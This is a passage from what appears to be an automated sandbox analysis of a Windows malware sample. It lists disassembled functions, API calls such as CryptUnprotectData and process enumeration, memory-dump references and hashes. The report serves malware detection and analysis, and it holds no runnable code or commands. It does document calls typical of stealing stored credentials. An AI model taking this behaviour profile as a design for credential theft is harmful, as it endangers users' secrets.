                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID: wwww
                                  • API String ID: 3317088062-671953474
                                  • Opcode ID: f44c44314043e7b3b7ece84cc47ea24c64f68c06f0fcb685b90144b58f053c1a
                                  • Instruction ID: b3d2208d7b6c4b536dbc476205a8d6bab148f8fd3a1477424d179711345a712a
                                  • Opcode Fuzzy Hash: f44c44314043e7b3b7ece84cc47ea24c64f68c06f0fcb685b90144b58f053c1a
                                  • Instruction Fuzzy Hash: F201F771A00604ABD7188B58DC4ABAABB7AEB84721F14832BF915D73C0D774190086E5
                                  Function 003E7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003E775E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E7765
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003E778D
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003E77AD
                                  • LocalFree.KERNEL32(?), ref: 003E77B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 0a798d53746b0f1395eecca31c240f6dd4b0ca1f1e06232235214a739af2be2c
                                  • Instruction ID: cc0b4713e11d77a3372d2cf4580ee52cffcca2f3c1cc17508f51154d6b01f080
                                  • Opcode Fuzzy Hash: 0a798d53746b0f1395eecca31c240f6dd4b0ca1f1e06232235214a739af2be2c
                                  • Instruction Fuzzy Hash: 03011275B40318BFEB10DB949C4AFEA7779EB48B15F108155FA05EB2C0D6B099008BA5
                                  Function 0079D454 Relevance: 6.7, Strings: 4, Instructions: 1688COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "+_$?oiY$jij_$vb|
                                  • API String ID: 0-816163998
                                  • Opcode ID: e5a6d92de573213a6e7cc2eed1e58ee5064fcb0af03839f032e6c175b585d057
                                  • Instruction ID: 5c953eb2a9ea4162b765664f6ccdc6691f10825bbf401e9b1db0b9e71509522f
                                  • Opcode Fuzzy Hash: e5a6d92de573213a6e7cc2eed1e58ee5064fcb0af03839f032e6c175b585d057
                                  • Instruction Fuzzy Hash: 16B25AF3A0C204AFE3046E2DEC85A7ABBD9EFD4320F1A453DEAC5C7744E97558048692
                                  Function 0079EF58 Relevance: 6.6, Strings: 4, Instructions: 1592COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6;$Wkl$w"v$7q
                                  • API String ID: 0-3240234564
                                  • Opcode ID: e311d72d07683d41039f24f55f02ccb1d32f97c99ea65100c9c7872dd3b8679a
                                  • Instruction ID: 050df112900ec5d44c6c73a94b8e4553f36b16a9430dca916d87b127b8d0c2a2
                                  • Opcode Fuzzy Hash: e311d72d07683d41039f24f55f02ccb1d32f97c99ea65100c9c7872dd3b8679a
                                  • Instruction Fuzzy Hash: E4B2F7F3A082049FE3046E2DEC8567AFBE9EF94720F16493DEAC4C3744EA3558158697
                                  Function 007A0B04 Relevance: 6.6, Strings: 4, Instructions: 1589COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: '~J]$LKn;$RxK|$j-V.
                                  • API String ID: 0-237302349
                                  • Opcode ID: 855a899af9ee1dc2bc5b27a8183bfa79d60669bd4afdfb1ffbe67f7e37664b72
                                  • Instruction ID: ffac72a3618e6e0d587880a43421452e60cf425a6dbfaf8015b5f20d9782a5f8
                                  • Opcode Fuzzy Hash: 855a899af9ee1dc2bc5b27a8183bfa79d60669bd4afdfb1ffbe67f7e37664b72
                                  • Instruction Fuzzy Hash: CBB2F7F3A0C2049FD7046E2DEC85A7ABBE9EF94720F16893DEAC483344E63558158797
                                  Function 00403A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004071E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004071FE
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00403A96
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00403AA9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00403ABF
                                    • Part of subcall function 00407310: lstrlen.KERNEL32(------,003E5BEB), ref: 0040731B
                                    • Part of subcall function 00407310: lstrcpy.KERNEL32(00000000), ref: 0040733F
                                    • Part of subcall function 00407310: lstrcat.KERNEL32(?,------), ref: 00407349
                                    • Part of subcall function 00407280: lstrcpy.KERNEL32(00000000), ref: 004072AE
                                  • CloseHandle.KERNEL32(00000000), ref: 00403BF7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 9061a0ac2685f7d142a570ce28ea8c44166bc335d1782ca0f4c171d18530bd11
                                  • Instruction ID: 0f43398d5f39d45af9f15de92ab2f2dddb422b55844f20d100ab25fbf07a1c05
                                  • Opcode Fuzzy Hash: 9061a0ac2685f7d142a570ce28ea8c44166bc335d1782ca0f4c171d18530bd11
                                  • Instruction Fuzzy Hash: 7E81F631904204DFD714CF19C948B96BBB5BB4431AF29C1BED408AB3E2D77AAD82CB54
                                  Function 003EEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 003EEA76
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 003EEA7E
                                  • lstrcat.KERNEL32(0040CFEC,0040CFEC), ref: 003EEB27
                                  • lstrcat.KERNEL32(0040CFEC,0040CFEC), ref: 003EEB49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 3d98be170f3061074731374c397c48aab5cab8057fc0d28ae15a8c62420c525d
                                  • Instruction ID: f226faa6b9b499eda887e960a3e4d43478c9c560f35e3bea98b566d79fe49d52
                                  • Opcode Fuzzy Hash: 3d98be170f3061074731374c397c48aab5cab8057fc0d28ae15a8c62420c525d
                                  • Instruction Fuzzy Hash: 4731E775A04119EBDB109B59EC45FEEB77EDF44705F04817AF909E3280DBB05A048BA6
                                  Function 004040B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004040CD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004040DC
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 004040E3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00404113
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                  • String ID:
                                  • API String ID: 3825993179-0
                                  • Opcode ID: cfe8ad0aa625ea09d06c9065544898ac9dc1005552a7d5f48e872b44fe995620
                                  • Instruction ID: 58ac40f8a32d4a8fca112bcaf703e68b868c39b01694f059a12272c4b51ac3c0
                                  • Opcode Fuzzy Hash: cfe8ad0aa625ea09d06c9065544898ac9dc1005552a7d5f48e872b44fe995620
                                  • Instruction Fuzzy Hash: AF011EB0600205ABDB109FA5EC55BAB7BAEEF89311F14816ABE0997340DA719950CBA4
                                  Function 00402B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0040A3D0,000000FF), ref: 00402B8F
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00402B96
                                  • GetLocalTime.KERNEL32(?,?,00000000,0040A3D0,000000FF), ref: 00402BA2
                                  • wsprintfA.USER32 ref: 00402BCE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: ca5d196100c96d5c7bf308dfe0184afdff42e27a541758f14cc62c7e10658d16
                                  • Instruction ID: a71e76086396b1bf825172790a3b8df341ac9e5c85be60468cc8bdce33e3246f
                                  • Opcode Fuzzy Hash: ca5d196100c96d5c7bf308dfe0184afdff42e27a541758f14cc62c7e10658d16
                                  • Instruction Fuzzy Hash: 0E0140B2904128ABCB149BD9DD45FFEB7BDFB4CB12F04411AFA05A2290E7785940C7B5
                                  Function 003E9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003E9B3B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 003E9B4A
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003E9B61
                                  • LocalFree.KERNEL32 ref: 003E9B70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: fd7ae2494bc5dc4db049f432e123f6728595ecf4d2de84dd7d8347b229951cfc
                                  • Instruction ID: 4bbb4ef094bb9953356b1f2d4a45f103355f7642c0df305afb600c6d4c412e53
                                  • Opcode Fuzzy Hash: fd7ae2494bc5dc4db049f432e123f6728595ecf4d2de84dd7d8347b229951cfc
                                  • Instruction Fuzzy Hash: 3DF01DB03403226BF7315F65AC5AF967BA9EF08B51F250215FA45EA2D0D7B09880CBA4
                                  Function 00798C36 Relevance: 5.8, Strings: 4, Instructions: 761COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
